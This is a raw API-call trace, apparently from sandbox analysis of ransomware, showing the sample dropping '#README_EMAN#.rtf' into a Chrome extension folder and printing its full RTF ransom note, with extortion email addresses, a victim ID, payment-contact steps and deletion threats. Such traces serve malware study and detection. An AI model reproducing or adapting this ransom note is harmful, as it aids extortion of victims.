0xffffffff [0283.762] GetLastError () returned 0x2 [0283.762] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b0 [0283.894] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.894] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.894] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235a8a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 